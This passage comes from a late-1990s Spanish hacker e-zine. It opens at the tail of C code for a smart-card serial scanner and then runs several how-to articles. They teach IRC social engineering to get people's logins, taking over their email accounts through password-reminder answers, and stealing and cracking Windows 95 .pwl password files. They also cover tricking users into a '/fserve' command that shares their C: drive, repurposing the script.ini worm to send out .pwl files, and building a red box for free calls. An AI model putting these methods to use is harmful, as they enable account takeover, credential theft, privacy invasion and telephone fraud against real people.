  3407.     /* process the result 
  3408.      * 61 xx is okay with length (Schlumberger Cryptoflex)
  3409.      * 9x 00 is okay (Chipknip?) 
  3410.      */
  3411.     if ( (((buf[0] & 0xf0)==0x90) && (buf[1]==0)) ||
  3412.          (buf[0]==0x61) ) {
  3413.       filelist[i]=1;
  3414.       /* now we need to select the MF again otherwise we can end
  3415.        * up confused with going down a directory level which isn't
  3416.        * what we want
  3417.        */
  3418.     } else
  3419.       filelist[i]=0;
  3420.  
  3421.   }
  3422.   return(1);
  3423. }
  3424.  
  3425. int SCT0_ScanForResponse(SIO_INFO *s,char *ubuf,int ubufsiz)
  3426. {
  3427.   long aspeed;
  3428.   int aparity,adatabits,astopbits,aiomode;
  3429.   char buf[256];
  3430.   int len,j;
  3431.  
  3432. /*  for(aspeed=0;aspeed<N_all_speed;aspeed++) */
  3433.  
  3434.     aspeed=0;
  3435.  
  3436.     for(adatabits=0;adatabits<N_all_databits;adatabits++)
  3437.       for(astopbits=0;astopbits<N_all_stopbits;astopbits++)
  3438.         for(aparity=0;aparity<N_all_parity;aparity++)
  3439.           for(aiomode=0;aiomode<N_all_iomode;aiomode++) {
  3440.         SIO_SetSpeed(s,all_speed[aspeed]);
  3441.         SIO_SetDataBits(s,all_databits[adatabits]);
  3442.         SIO_SetStopBits(s,all_stopbits[astopbits]);
  3443.         SIO_SetParity(s,all_parity[aparity]);
  3444.         SIO_SetIOMode(s,all_iomode[aiomode]);
  3445.         SIO_WriteSettings(s);
  3446.  
  3447.         len=SIO_WriteBuffer(s,ubuf,ubufsiz);
  3448.  
  3449.         /* we need to delay before reading to give the reader time
  3450.          * to start responding
  3451.          */
  3452.         SIO_Delay(s,100);
  3453.  
  3454.         /* now read in some data - which should be the INS */
  3455.         for(j=0;j<2;j++) {
  3456.           len=SIO_ReadBuffer(s,buf,sizeof(buf));
  3457.           if (len>0)
  3458.         break;
  3459.         }
  3460.  
  3461.         if (1||dbglev) {
  3462.           SLOG_printf(outf,"settings: %s\n",SIO_GetSettingsString(s));
  3463.           SLOG_printf(outf,"RESPONSE TO COMMAND\n");
  3464.           SLOG_dump(outf,buf,len,0);
  3465.           SLOG_printf(outf,"\n");
  3466.         }
  3467.  
  3468.       }
  3469.   return(0);
  3470. }
  3471.  
  3472. ------------ FIN -------------------------------------------------------------
  3473.  
  3474.         Pues disfrutarlo y sed inteligentes con el codigo fuente, lo
  3475.   recomendable seria que pasarais por el website del CCC y tambien por los
  3476.   url∩s que se indican en el File Readme.gsm. Byes.
  3477.  
  3478.                                                    - J.J.F. / HACKERS TEAM -
  3479.  
  3480. <────────────────────────────────────────────────────────────────────────────>
  3481. ██████████████████████████████████████████████████████████████████████████████
  3482. <────────────────────────────────────────────────────────────────────────────>
  3483.  
  3484.         heres libre de poner esto en tu pagina web, distribuirlo en bbs o de
  3485.   la forma que tede la gana 'siempre y cuando respetes este encabezado' texto
  3486.   escrito,maquetado,y todo lo demas por: ZeD                                         
  3487.   dudas comentarios,etc.. a zed@mixmail.com-------
  3488.   www.angelfire.com/ak/HACKZED/ZED2.html
  3489.   miembro del HaCk`S-wEb-RiNg=http://come.to/HaCkS-wEb-RiNg
  3490. ------------------------------------------------------------------------------
  3491.  
  3492.                    ###############################################
  3493.                    #      ¿QUE SE PUEDE HACER EN EL IRC?         #
  3494.                    ###############################################
  3495.                                     POR: ZeD
  3496.  
  3497.         Hay mucha gente (la mayoria) que se mete en el Irc,para conversar con
  3498.   gente de otros paises o ciudades,en realidad para eso se creo el Irc
  3499.   (Internet Relay Chat).
  3500.         Luego con la aparicion de los primeros script`s para el Irc, se
  3501.   empezaron a pasar fotos, y otras clases de archivos gracias a la opcion de
  3502.   "f-server",que aportaban estos. Mas tarde se empezaron a crear las primeras
  3503.   "armas" (y defensas),para lo que hoy denominados "Irc-War",de todos es
  3504.   conocido el "Winnuke",y todos (o la mayoria) de los script`s modernos
  3505.   incluyen alguna opcion referente al "Irc-War".
  3506.         Vale,todo esto esta muy bien,pero.... (ahora llega lo bueno del Irc)
  3507.   al conocer a tanta gente,muchas veces (la mayoria),nos cruzamos con el
  3508.   tipico tiparraco que se las da de listo y que dice que se sabe todos los
  3509.   trucos (en realidad no saben ni de lo que les hablas la mayoria de las
  3510.   veces),y lo mejor que puedes hacer con esta gente es aprovecharte de su
  3511.   "sabiduria". ¿Para que?,pues para conseguir passwords, loggins, direcciones
  3512.   y si te lo montas bien lo que le quieras sacar.
  3513.         El perfil de estos individuos suele ser un caracter alegre y muy
  3514.   hablador, aqui esta su mayor punto debil. Hablan y la mayoria de las veces
  3515.   lo hacen demasiado, aqui es donde entras tu.
  3516.         Desde luego si al tio (por muy tonto que sea), le entras diciendole lo
  3517.   tipico de: "oye veras esque se me a jodido un archivo del Gⁿindows, y queria
  3518.   saber si me podias pasar el tuyo, es un archivo que esta en la carpeta de
  3519.   windows, tiene de extension .pwl", el tio lo mas probable es que desconfie y
  3520.   o te ignore, o que te diga que usa el "Nt".
  3521.         Tienes que usar todo tu ingenio y astucia para hacerte "colegilla"
  3522.   sullo. Lo primero que debes hacer es ponerte otro nick que no vallas a usar
  3523.   nada mas que cuando vallas a hablar con el, ademas para que sea mas creible
  3524.   este nick estaria bien que fuese algo normal como: latino, juan y cosas asi.
  3525.         No te pongas El_Se╤oR_dEl_dEsAsTrE, por que lo mas probabla es que te
  3526.   mande a freir monas. Entra en canales donde habitualmente la gente no sea
  3527.   muy experta en ordenadores,como #sexo o #fotoxXx, aqui es donde la gente
  3528.   mas se enrolla y es de donde puedes sacar mas probecho de tu tiempo.
  3529.         Lo siguiente es usar algo de "ingenieria social". si le entras al tio
  3530.   como te he dicho antes no te hara ni caso, lo mejor que puedes hacer es, por
  3531.   ejemplo si estas en un canal de fotoxXx intentar conseguir el pass y el
  3532.   logging de alguna pagina porno yaque en esta clase de canales hay muchas
  3533.   personas que son socias de alguna pagina X.
  3534.         por ejemplo digamos que has localizado a un tio que crees que pueda
  3535.   ser socio de la pagina depago del Play Boy, un ejemplo de como conseguir su
  3536.   pass y su loggin seria esta conversacion en un chat privado: (tu heres juan
  3537.   y el pepe)
  3538.  
  3539.   ->juan: oye he estado viendo las fotos que me has cambiado y me he dado
  3540.           cuenta de que hay muchas del Play Boy ¿de donde las has sacado?
  3541.   ->pepe: de la pagina
  3542.   ->juan: ¿heres socio?
  3543.   ->pepe: si
  3544.   ->juan: joder pues tienes que tenr mogollon de pelas, por que eso tiene que
  3545.           salir caro ¿no?
  3546.   ->pepe: no te creas solo cobran 25$ al mes
  3547.   ->juan: hombre barato, barato, no es... ¿que tuviste que hacer para hacerte
  3548.           socio?
  3549.   ->pepe: pues poca cosa, rellene un formulario de inscripcion y a los dos
  3550.           dias ya tenia mi clave y mi nombre de usuario
  3551.   ->juan: a mi hace unos dias me dieron un nombre y una clave, pero ya no
  3552.           funcionaba
  3553.   ->pepe: es posible, los cambian cada 2 semanas
  3554.  
  3555.         aqui ya te has enterado de que las claves de acceso a la pagina de
  3556.   socios del Play Boy las cambian cada 2 semanas
  3557.  
  3558.   ->juan: ¿y como os las comunican por e-mail?
  3559.   ->pepe: si
  3560.  
  3561.         ahora lo que tienes que conseguir es que te de su direccion de e-mail,
  3562.   si tienes suerte a donde se lo manden sera a un servicio de e-mail gratuito
  3563.   tipo "latinmail". Esto pasa asi la mayoria de las veces debido a que el
  3564.   correo tambien lo use su padre, y no creo que le agrade ver como su hijo se
  3565.   gasta la paga en pagar un acceso a una pagina pornografica. La mayoria de
  3566.   los servicios gratuitos de e-mail disponen de un servicio extra de
  3567.   "recordatorio de contraseñas" a la que puedes acceder si pones la direccion
  3568.   de e-mail (pepe@latinmail.com por ejemplo), y su grupo preferido de musica.
  3569.         En estos casos mientras estas hablando con el lo mejor que puedes
  3570.   hacer escuando te de su direccion de e-mail, visita su servidor y veras si
  3571.   la direccion de e-mail es de uno de estos servios gratuitos. Si no es asi
  3572.   intenta sonsacarle a que direccion de e-mail le mandan los passwords.
  3573.         Pongamos que se lo mandan a la cuenta "pepe@latinmail.com" y que ese
  3574.   servicio de e-mail gratuito pone a disposicion de los usuarios el
  3575.   "recordatorio de contraseña".
  3576.         Hazte una cuenta en ese servidor para ver si ofrece ese servicio o no
  3577.   lo ofrece. Si lo hace (que sera lo mas probable), mira las opcion es que te
  3578.   da para recordarte la contraseña. Pongamos que te dan las opciones: "tu
  3579.   grupo de musica favorito", "la marca de yogures que compra tu madre" y "el
  3580.   nombre de tu discoteca favorita", vale ahora lo que tienes que hacer es,
  3581.   averiguar todas esas cosas que te dan opcion a recordar la contraseña de el.
  3582.         Una vez que lo hayas logrado intenta entrar en su cuenta de e-mail y
  3583.   si lo logras (que sera lo mas probable), intenta averiguar mas o menos
  3584.   sobre que dia le mandan los passwords, y listo a entrar en su cuenta de
  3585.   e-mail los dias que se las manden, y copiar el loggin y el password, pero
  3586.   ojo, no le borres los mensajes que le llegen con los passwords o se olera
  3587.   que alguien los a pillado y cambiara su cuenta de e-mail.
  3588.  
  3589.         Otra de las cosas que se pueden conseguir en el Irc, son los ya
  3590.   famosos ".pwl", que guardan las contraseñas del Gⁿindows, esto ultimamente
  3591.   se a convertido en algo dicifil de conseguir por que ya lo sabe todo el
  3592.   mundo pero prueba por si acaso.
  3593.         Pero claro un .pwl, si no lo "descompilas" y lo pasas a codigo
  3594.   "legible" no te vale para nada. Ahorate voy a enseñar como conseguir usar
  3595.   el ".pwl", que con tanto esfuerzo has conseguido sacarle a un pive que se
  3596.   conectaba desde una universidad (por ejemplo) (si heres universitario,
  3597.   estas de suerte. Pilla todos los ".pwl" que puedas de los ordenadores que
  3598.   esten conectados a una red o no, y a disfrutar cambiandote las notas o
  3599.   pillando el examen que tienes la semana que viene)
  3600.  
  3601.         Bueno supongo que ya tienes el .pwl del ordenador de tu universidad
  3602.   objetivo, bien ahora te estaras preguntando "¿y que coño hago yo con esto?",
  3603.   pos te lo explico ahora mismo :) .
  3604.         Lo primero que tienes que hacer es copiar las d.n.s de la universidad
  3605.   (o de donde sea el pwl) por que si no de poco te va a servir desencriptarlo.
  3606.         Vale supongo que ya tienes todo lo necesario de momento, osea el pwl,
  3607.   y las d.n.s. Bien ahora lo que tienes que hacer es lo sieguiente.
  3608.         La parte del texto que aqui se expone la ha hecho ToMaCHeLi y la voy
  3609.   a poner literalmente, tambien puedes bajarte el texto por separado en la
  3610.   pagina del HaCk`S-wEb-RiNg http://come.to/HaCkS-wEb-RiNg
  3611. ------------------------------------------------------------------------------
  3612.  
  3613.                                  @@@@@@@@@
  3614.         By ToMaCHeLi            @  PWL's  @          By ToMaCHeLi
  3615.                                  @@@@@@@@@
  3616. ------------------------------------------------------------------------------
  3617.   1.- Introduccion.
  3618.   2.- Que son?.
  3619.   3.- Como conseguirlos.
  3620.   4.- Como desencriptarlos.
  3621. ------------------------------------------------------------------------------
  3622.  
  3623.   1.- Introduccion:
  3624.   -----------------
  3625.  
  3626.         Bueno ante todo me he decidido a escribir este articulo para que
  3627.   veais la gran seguridad que tiene Windows 95 (ventanucos pa los amigos).
  3628.         Asi es que piensate antes de ponerte el Windows 98 (mas de lo mismo
  3629.   seguro).
  3630.  
  3631.   2.- Que son?:
  3632.   -------------
  3633.  
  3634.         Los PWL's son archivos donde Windows 95 guarda todas las contraseñas
  3635.   del sistema (eso si para que queden almacenadas debes seleccionar el cuadro
  3636.   donde pone "Guardar contraseña"). Ejemplos pueden ser la contraseña de
  3637.   entrada a Windows 95, contraseña de entrada a una carpeta compartida en una
  3638.   red LAN, y algunas mas. Pero lo que mucha gente no sabe es que la propia
  3639.   contraseña de entrada a INTERNET se guarda en este archivo, incluido
  3640.   tambien el nombre de usuario.
  3641.  
  3642.   3.- Como conseguirlos:
  3643.   ----------------------
  3644.  
  3645.         Si sigues leyendo esto veo que te interesa, jeje. Estos archivos se
  3646.   encuentran en el directorio principal de Windows 95 que normalmente sera
  3647.   c:\windows. Para empezar a practicar un poco puedes coger tus propios PWL
  3648.   que tendras en el directorio antes mencionado, y si quieres arriesgarte un
  3649.   poco mas puedes intentar conseguir PWL's de otras maquinas.
  3650.         Si tienes acceso al ordenata de la universidad donde estudias, de un
  3651.   conocido (no amigo, que eso esta mu mal), de una feria de ordenatas, etc..
  3652.   pos nada chico pilla los PWL (pero que no te pillen pillandos jeje, Ah! y
  3653.   esto yo no te lo he dicho) ;). Tambien puedes intentarlo por el IRC mediante
  3654.   ingenieria social (que no sabes lo que es????, ¿que haces leyendo esto tio?
  3655.   dejalo ya...) u otras tecnicas que sepas...
  3656.  
  3657.   4.- Como desencriptarlos:
  3658.   -------------------------
  3659.  
  3660.         Asi que ya tienes los archivitos eh?, entonces manos a la obra. Las
  3661.   maneras de desencriptarlos son diversas pero la mas facil que he encontrado
  3662.   es utilizando un par de herramientas destinadas para ello. Estas
  3663.   herramientas son el GLIDE y el PWLTOOL (cada una de ellas tiene sus
  3664.   ventajas e inconvenientes). Para usarlas yo recomiendo lo siguiente:
  3665.  
  3666.         Supongamos que tenemos el archivo Tom.pwl Lo primero que haria seria
  3667.   utilizar el GLIDE para ver si dentro de este archivo hay passwords para
  3668.   ello deberia verse algo asi al final del archivo:
  3669.  
  3670.   Recource[5] (2)
  3671.  
  3672.   Recource[6] (2)
  3673.  
  3674.   Recource[7] (2)
  3675.  
  3676.   Recource[8] (2)
  3677.  
  3678.   Recource[9] (2)
  3679.  
  3680.   Recource[10] (50)
  3681.   0  -3*Rna\Servicom\a3004773@servicomA2D41B37
  3682.   Recource[11] (2)
  3683.  
  3684.   Recource[12] (2)
  3685.  
  3686.   Recource[13] (54)
  3687.   2 $ Todo -0e¡y├▌ñ«╤∙ OIOI≡gADMIN
  3688.   Recource[14] (2)
  3689.  
  3690.   Recource[15] (2)
  3691.  
  3692.         (Esos simbolos raros quieren decir que aqui existen passwords).
  3693.  
  3694.   Aqui lo importante seria:  
  3695.   -------------------------
  3696.  
  3697.         Nombre de usuario: a3004773@servicom
  3698.         Password: A2D41B37
  3699.  
  3700.         (Esto es la conexion a INTERNET a traves de Servicom)
  3701.         (NO es verdadera por supuesto) :)
  3702. ------------------------------------------------------------------------------
  3703.  
  3704.         Si no existen passwords en el archivo (que tambien puede ser) se
  3705.   veria asi: (si te sale esto tira a la papelera el PWL) :))
  3706.  
  3707.   Recource[5] (2)
  3708.  
  3709.   Recource[6] (2)
  3710.  
  3711.   Recource[7] (2)
  3712.  
  3713.   Recource[8] (2)
  3714.  
  3715.   Recource[9] (2)
  3716.  
  3717.   Recource[10] (50)
  3718.  
  3719.   Recource[11] (2)
  3720.  
  3721.   Recource[12] (2)
  3722.  
  3723.   Recource[13] (54)
  3724.  
  3725.   Recource[14] (2)
  3726.  
  3727.   Recource[15] (2)
  3728.  
  3729.         (aqui no hay passwords).
  3730.  
  3731.   Aqui lo importante seria:
  3732.   -------------------------
  3733.  
  3734.         NADA NADA NADA NADA NADA NADA NADA NADA NADA Y NADA
  3735.                            
  3736. -----------------------------------------------------------------------------
  3737.  
  3738.         Y te preguntaras, si ya aparece la password de INTERNET y el nombre
  3739.   de usuario con el GLIDE pa que usar el PWLTOOL????. Te explico, tengo
  3740.   comprobado que cuando la password de INTERNET supera los 8 digitos a partir
  3741.   del digito 8 ya no apareceran los restantes (joer explicate). Por ejemplo:
  3742.  
  3743.         Password verdadero : 795342A3B5
  3744.         Password que aparece con el GLIDE: 795342A3
  3745.  
  3746.         (fijate falta el B5)
  3747.  
  3748.         Pues este es el inconveniente que tiene el GLIDE y por eso se utiliza
  3749.   el PWLTOOL.
  3750.         Pero con este hay otro pequeño inconveniente, resulta que para que
  3751.   salgan todos los password que hay dentro del PWL se necesita el password de
  3752.   entrada a Windows 95 (joer que lio).
  3753.         Ejemplo, tenemos el archivo Toma.pwl, este archivo debes ponerlo en
  3754.   el directorio de windows del ordenata de tu casa por ejemplo, despues
  3755.   reinicias el equipo para que te pida contraseña de entrada al equipo (esto
  3756.   activalo en el panel de control-contraseñas), cuando te pida el nombre de
  3757.   usuario pon Toma (se me olvidava en los PWL el nombre del archivo es siempre
  3758.   el nombre del usuario, ejemplo Toma.pwl Nombre de usuario: Toma).
  3759.         Ahora viene lo malo, sabes la contraseña de ese nombre de usuario??,
  3760.   si la sabes la pones y ya esta entras en Windows 95 ejecutas el PWLTOOL y ..
  3761.   TACHAN!!! todas las passwords que contiene el PWL te seran desveladas sin
  3762.   el inconveniente que tiene el GLIDE (lo de los 8 digitos, recuerdas??).
  3763.  
  3764.         (Pa los que no tienen la contraseña del nombre de usuario de windows)
  3765.         Pero y si no sabes la contraseña de entrada a Windows con ese nombre
  3766.   de usuario??
  3767.         Arggg, eso se complica, entonces deberas usar el PWLTOOL en el que
  3768.   una de sus opciones es la de utilizar un diccionario de palabras para sacar
  3769.   la contraseña del nombre de usuario del archivo PWL (y esto no es facil...,
  3770.   pero se puede conseguir).
  3771.         Tambien puedes pensar otras maneras de utilizar el PWLTOOL pero eso
  3772.   te lo dejo a ti no te voy a decir todo macho (o gachi lo que seas, una gachi
  3773.   hacker??, que raro no hay muchas...).
  3774.  
  3775.         Por mi parte es todo, espero que os haya servido de ayuda todo este
  3776.   rollo. Si algunno quiere añadir o corregir algo que me avise.
  3777.  
  3778. ******************************************************************************
  3779.  
  3780.         Este articulo es de libre distribucion (siempre que no modifiques
  3781.   nada, o te buscare hasta la muerte jeje), ademas no me hago responsable de
  3782.   lo que puedas llegar a cometer con su contenido.
  3783.  
  3784. ******************************************************************************
  3785.  
  3786.         Articulo realizado para el grupo Hack's-Web-Ring.
  3787.  
  3788.                             Realizado por:
  3789.  
  3790.                           --- ToMaCHeLi ---
  3791.  
  3792.                  WEB: http://members.tripod.com/~tomacheli
  3793.  
  3794.                       MAIL: tomacheli@geocities.com
  3795.  
  3796.         Un saludo pa todos los del grupo :) 
  3797. -----------------fin del texto escrito por ToMaCHeLi--------------------------
  3798.  
  3799.         bien despues de esto supongo que estras deseando entrar  en el Irc y
  3800.   empezar a actuar, pero antes de hacer eso te recomiendo que sigas leyendo
  3801.   por que voy a pasar a explicarte algunos trucos quete facilitaran la vida
  3802.   en el Irc.
  3803.         Muchas veces lo de la ingenieria social no funciona y pillar un pwl
  3804.   apartir de este metodo se esta convirtiendo cada dia mas dificil, pero
  3805.   existe un comando que te puede facilitar las cosas por que no todo el mundo
  3806.   lo conoce (y sobre todo los novatos) el comando en cuestion es el
  3807.   siguiente: /fserve el_nick_que_uses 5 c:\
  3808.         si haces que un usuario ponga este comando en el canal, privado,
  3809.   Dcc-chat.... lo que hara este comando es darte acceso a su unidad c:\, el
  3810.   pequeño inconveniente que tiene esto es que el pive antes de darte acceso
  3811.   le saldra un mensage que le dira que te va a dar acceso a su unidad c:\, el
  3812.   mensage en cuestion sale en ingles, osea que si tienes suerte y el pive no
  3813.   controla mucho ingles, pasara de leer el mensage y aceptara sin pedirte
  3814.   ninguna explicacion.
  3815.         Seguro que has oido hablar del archiconocido "virus" del "script.ini"
  3816.   como sabras este "virus" lo que hace es que cuando entras en un canal
  3817.   enviasa todos los alli presentes este archivo, pero.... ¿has probado a
  3818.   modificar este "ini" para que envez de mandar el "script.ini", mande el
  3819.   "c:\windows\*.pwl"? investiga que esto puede ser muy interesante.
  3820.         Otra opcion que tienes si tienes algo de idea de "scripting" es
  3821.   modificar la parte del fserver del script que uses para que envez de que
  3822.   cuando te den acceso a un fserver en la carpeta que ellos elijan te lo den
  3823.   en "c:\" o en "c:\windows", esto no se de que manera se puede hacer,
  3824.   pero me han dicho que si se puede,osea que andaros al loro y echad un
  3825.   vistazo de vez encuando a las personas que esten en vustro fserver, para ver
  3826.   por donde andan y lo que se estan bajando.
  3827.  
  3828.         pues eso es todo, si tienes alguna duda, sugerencia o simplemente
  3829.   quieres decirme algo referente a este texto, puedes hacerlo escribiendo a:
  3830.   zed@mixmail.com
  3831.                           !!feliz irc-hack a todos¡¡
  3832.  
  3833. <────────────────────────────────────────────────────────────────────────────>
  3834. ██████████████████████████████████████████████████████████████████████████████
  3835. <────────────────────────────────────────────────────────────────────────────>
  3836.  
  3837.         ZeD no se hace responsable de las consecuencias que te pueden suceder
  3838.   si usas mal cualquier informacion aqui dada, pero te recomienda que no uses
  3839.   nada de lo aqui escrito (por tu bien)
  3840.         puedes subir este texto a tu web, bbs o distribuirlo de la manera que
  3841.   te de la gana siempre y cuando mantengas este encabezado, no alteres ninguna
  3842.   parte del texto y me avises antes a zed@mixmail.com
  3843. ------------------------------------------------------------------------------
  3844.  
  3845.                 ##############################################
  3846.                 #          PHREACKING PARA NOVATOS           #
  3847.                 ##############################################
  3848.               por ZeD---http://www.angelfire.com/ak/HACKZED/ZED2.html
  3849.                      ---http://come.to/HaCkS-wEb-RiNg
  3850.                       (miembro del HaCk`S-wEb-RiNg)                                                          
  3851.  
  3852.  
  3853.   1.¿que es phreackear?
  3854.   2.¿por que phreackear?
  3855.   3.reglas
  3856.   4.¿como empezar en esto del phreacking?
  3857.   5.descripcion brebe de las BOXES
  3858.   6.RED-BOXING
  3859.   7.despedida y cierre
  3860. ------------------------------------------------------------------------------
  3861.  
  3862.   1. ¿QUE ES PHREACKEAR?
  3863.  
  3864.         phreackear es simplemente hacer cualquier tipo de llamadas
  3865.   (provinciales, internacionales) completamente sin pagar un duro, tener un
  3866.   conocimento + o - completo de la red de telefonia y de que se puede hacer
  3867.   con ella, como usar determidas cosas para no pagar un servicio que deveria
  3868.   ser mucho mas barato, ya que es algo que se ha convertido en algo
  3869.   INPRESCINDIBLE.
  3870.  
  3871.   2. ¿POR QUE PHREACKEAR?
  3872.  
  3873.         la explicacion es muy simple,piensalo de esta manera: ¿por que tengo
  3874.   que pagar una factura que cada dia es mas elevada por usar un SERVICIO de
  3875.   maxima NECESIDAD? ¿por ademas de ahorrar pagar la luz el agua...etc... que
  3876.   tambien son SERVICIOS de maxima NECESIDAD, tambien lo tengo que hacer para
  3877.   pagar el telefono? pues por una razon muy simple, las compañias telefonicas
  3878.   abusan de los consumidores que usan un SERVICIO cobrandoles mucho mas de lo
  3879.   que deveria costar, solo por que es NECESARIO, ademas, ellos nos engañan
  3880.   con "PLANES CLAROS" y demas jilipolleces que luego siempre son mentira, ¿por
  3881.   que no les vas a poder engañar tu a ellos tambien?
  3882.  
  3883.   3. REGLAS DEL PHREACKING
  3884.  
  3885.         como en todo, aqui tambien hay que seguir unas reglas, que mas que
  3886.   PENALES, son MORALES.
  3887.  
  3888.   1- no uses nunca una BOX con tu propia linea telefonica (seria de tontos
  3889.      hacerlo)
  3890.   2- no hablar de tus proyectos phreackers por telefono (lo mismo de arriba)
  3891.   3- no uses tu nombre real cuando estes haciendo phreack (no tengo que
  3892.      decirtelo ¿verdad?)
  3893.   4- todos los materiales que uses debes guardarlos en buen sitio, no es
  3894.      conveniente que vallas dejando las cosas por hay tiradas para que la
  3895.      gente las vea
  3896.   5- (y aunque se contradiga con la primera) no es bueno joder a otra persona,
  3897.      que como tu esta siendo abusado por una compañia telefonica, intenta usar
  3898.      siempre lineas de empresas multimillonarias o cosas asi (aunque esto
  3899.      conlleva un mayor riesgo claro)
  3900.  
  3901.   4. ¿COMO EMPEZAR EN ESTO DEL PHREACKING?
  3902.  
  3903.         lo primero que tienes que hacer es construir los BOXES que vallas a
  3904.   usar en tus "sesiones" de todas maneras si tienes problemas al construirlos
  3905.   siempre hay otras alternativas... ;-) para empezar a phreackear lo que
  3906.   tienes que hacer es elejir bien los sitios donde lo vallas a hacer, como
  3907.   heres nuevo en esto, tardaras algo mas de tiempo que uno que ya controla
  3908.   del tema por lo tanto te recomiendo que uses sitios poco transitados y que
  3909.   lo hagas siempre de noche.
  3910.  
  3911.   5. DESCRIPCION DE LAS BOXES
  3912.  
  3913.     nombre de la BOX                    UTILIDAD
  3914.   ---------------------             ----------------
  3915.  
  3916.   RED-BOX-------------------genera tonos para llamadas gratis
  3917.   BLACK-BOX-----------------cuando se llama,el que llama no paga un duro
  3918.   BEIGE-BOX-----------------llamas con la linea de otra persona(la unica que
  3919.                             funciona en españa)
  3920.   GREEN-BOX-----------------genera tonos de llamada a cobro revertido
  3921.   CHEES-BOX-----------------cambia tu telefono a modo "cabina telefonica"
  3922.   ACRILIC-BOX---------------roba 3 vias de linea
  3923.   WATER-BOX-----------------detine el rastreo de la policia
  3924.   BOX-LANZAMIENTO-----------amplificador para el microfono del telefono
  3925.   BOX-BORRON(near)----------corta todas las lineas de tu area
  3926.   MAROON-BOX----------------crea una "party line"
  3927.   BOX-BROTE-----------------llama a los telefonos de tus vecinos
  3928.   CHROME-BOX----------------manipula las señales de trafico
  3929.   BOX-CLARA-----------------llamdas gratis
  3930.   COLOR-BOX-----------------graba las conversaciones telefonicas
  3931.   BOX DE COBRE--------------causa interferencias entre dos lineas que se esten
  3932.                             usando
  3933.   INFINITE-BOX--------------telefono de uso remoto
  3934.   BOX-ARCO IRIRIS-----------corta cualquier rastreo en la linea
  3935.  
  3936.         existen mas boxes pero estas son las mas interesantes.
  3937.  
  3938.   6. RED-BOXING 
  3939.  
  3940.         aqui te voy a explicar como hacer una red-box: lo primero que tienes
  3941.   que hacer es ir a tienda de radio y comprar un dialer que sea de tonos (un
  3942.   marcador de tonos valla) y un cristal de 6,5536 Mhz abre el marcador y
  3943.   quita el cristal que lleva, ahora mete el de 6,5536 Mhz (el que has
  3944.   comprado tu) cierras el marcador y EVOILA ya tienes tu red-box.
  3945.         estos es muy bonito ¿pero como lo uso ahora? te estaras preguntando
  3946.   (joder que impacientes sois) para hacerlo funcionar tienes que hacer lo
  3947.   siguiente: cuando te pidan 25pts para la llamada en el marcador tienes que
  3948.   pulsar "5*'s" por ejemplo (sin las comillas obviamente) cuando son 5pts
  3949.   "1*." cuando son 10pts hay que marcar "3*'s" y asi ¿a que no es dificil?
  3950.  
  3951.   7. DESPEDIDA Y CIERRE
  3952.  
  3953.         bueno pues esto es todo espero que esto te aya servido de referencia
  3954.   si estas empezando en esto del phreacking y si ya eres un entendido para
  3955.   recordarte algo que se te avia olvidado, en fin que me aya tirado 15
  3956.   minutos, para que valga de algo joñe
  3957.         bueno si me quereis comentar algo ya sabeis que podeis escribirme a
  3958.   zed@mixmail.com y que todo lo que he dicho a qui no es mas que una guia
  3959.   para que aprendas, pero no para que uses lo que aprendas 8-), pero si lo
  3960.   haces....aya tu bye
  3961.  
  3962. <────────────────────────────────────────────────────────────────────────────>
  3963. ██████████████████████████████████████████████████████████████████████████████
  3964. <────────────────────────────────────────────────────────────────────────────>
  3965.  
  3966.                     ############################################
  3967.                     #      como trucar el Gⁿindows95           #
  3968.                     ############################################
  3969.  
  3970.            texto escrito por ZeD--www.angelfire.com/ak/HACKZED/ZED2.html
  3971.                            --http://come.to/HaCkS-wEb-RiNg
  3972.   puedes subir este texto a tu web,bbs,ftp o lo que sea,siempre que mantengas
  3973.   este encabezado.
  3974.                              ACTUALIZACION:10/8/98
  3975.  
  3976.  
  3977.         ZeD no se hace responsable de los daños que el uso de este documento
  3978.   pueda ocasionar a tu pc y te recomienda siempre hacer copias de seguridad
  3979.   (por si las moscas)
  3980.  
  3981.         INDICE:
  3982.   1.como trucar el internet explorer
  3983.   2.pon el nombre que quieras a la papelera de reciclaje
  3984.   3.cambia el icono de las carpetas por el que tu quieras
  3985.   4.interface de 3.11 en w95
  3986.   5.crear un acceseo directo para apagar el pc
  3987.   6.cambiar el nombre de "mi pc"
  3988.   7.MS2.sys
  3989.   8.utilidades del sistema
  3990.   9.PROXImamente
  3991.  
  3992. ------------------------------------------------------------------------------
  3993.  
  3994.   1.COMO TRUCAR EL INTERNET-EXPLORER v3.1 en adelante
  3995.  
  3996.         simpre has querido cambiar el dibujio de la "E" que sale cuando estas
  3997.   navegando con el internet-explorer, pues es bien simple.
  3998.         La imagen que sale es un archivo ".bmp" que esta en la carpeta
  3999.   ..../internet explorer/ son los archivos que se llaman "Ani38.bmp" y
  4000.   "Ani26.bmp" abrelos y mira como son. Veras que son como una tira que segun
  4001.   la vas bajando se convierte en una animacion. Vale pues ahora crea tu logo
  4002.   tal como esta definido en los archivos cambialo y ya tienes el explorer
  4003.   trucado (puedes bajarte algunas imagenes de mi pagina que esta en:
  4004.   www.angelfire.com/ak/HACKZED/ZED2.html,en la seccion "download")
  4005.  
  4006.   2.COMO CAMBIAR EL NOMBRE A LA PAPELERA DE RECICLAJE
  4007.  
  4008.         cambiar el nombre de la papelera de reciclaje es muy simple: cambia
  4009.   el nombre en la clave del "regedit":(esta en la carpeta "windows")
  4010.   HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E
  4011.  
  4012.   3.CAMBIAR EL ICONO DE LAS CARPETAS POR EL QUE TU QUIERAS
  4013.  
  4014.         para cambiar el icono que representa las carpetas tienes que hacer lo
  4015.   siguiente: Muchos de los iconos que por defecto traen algunos archivos se
  4016.   pueden cambiar simplemente desde cualquier carpeta, mediante el menu ver,
  4017.   luego opciones... , tipos de arhivos y por ultimo editar, e inmediatamente
  4018.   despues selecionar cambiar icono. Pero esto no siempre nos vale, sobre todo
  4019.   si queremos cambiar los iconos de por ejemplo, las carpetas, el menu de
  4020.   Inicio...
  4021.         Para ello el truco es el siguiente: Lo primero que tenemos que hacer
  4022.   es saber el icono que queremos cambiar... por ejemplo, para cambiar el
  4023.   icono de las carpetas, debemos ejecutar el registro, irnos a la seccion
  4024.   HKEY_CLASSES_ROOT\Folder\DefaultIcon en la parte derecha aparecera
  4025.   (preterminado) "C:\WINDOWS\SYSTEM\shell32.dll,3", la primera idea.. que no
  4026.   funciona :) es ir y cambiar directamente el valor de la cadena para poner
  4027.   el icono que queremos. Pero lo que tenemos que hacer es ir a la seccion 
  4028.   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ explorer y
